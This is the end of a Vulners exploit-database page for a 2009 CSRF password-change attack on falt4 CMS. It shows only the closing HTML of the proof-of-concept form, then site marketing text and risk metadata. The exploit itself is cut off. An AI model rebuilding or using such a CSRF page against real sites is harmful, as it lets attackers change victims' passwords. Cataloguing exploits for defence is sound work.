style='text-decoration:none;'>Save</font></td></tr></table><br /><table cellpadding="0" cellspacing="0"><tr><td style="cursor:pointer;" class="button_background" onclick="javascript:history.back()"><font color="#FFFFFF" style='text-decoration:none;'>Back</font></td></tr></table><br /></td></tr></table><br /><br />   
  
  
<br><br>  
  
</td>  
</tr>  
  
</td>  
</tr>  
</table>  
</td>  
</tr>  
</table>  
  
</div>  
  
</body>  
</html>  
  
  
###############################################################END############################################################`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
15 Feb 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
falt4 cmscsrf vulnerabilityvictim's password
24